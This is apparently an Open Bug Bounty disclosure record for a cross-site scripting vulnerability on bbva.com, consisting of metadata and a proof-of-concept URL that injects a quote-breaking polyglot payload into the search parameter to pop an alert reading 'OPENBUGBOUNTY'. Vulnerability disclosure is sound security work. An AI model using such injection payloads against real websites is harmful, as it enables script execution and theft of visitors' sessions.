bbva.com XSS vulnerability

2017-02-14T01:12:00
ID OBB:213536
Type openbugbounty
Reporter nathanleegrant
Modified 2017-03-14T07:14:00

Description

Vulnerable URL:
https://www.bbva.com/en/information/?bbvaSearch=';alert(String.fromCharCode(79,80,69,78,66,85,71,66,79,85,78,84,89))//';alert(String.fromCharCode(79,80,69,78,66,85,71,66,79,85,78,84,89))//";alert(String.fromCharCode(79,80,69,78,66,85,71,66,79,85,78,84,89))//";alert(String.fromCharCode(79,80,69,78,66,85,71,66,79,85,78,84,89))//-->alert(String.fromCharCode(79,80,69,78,66,85,71,66,79,85,78,84,89))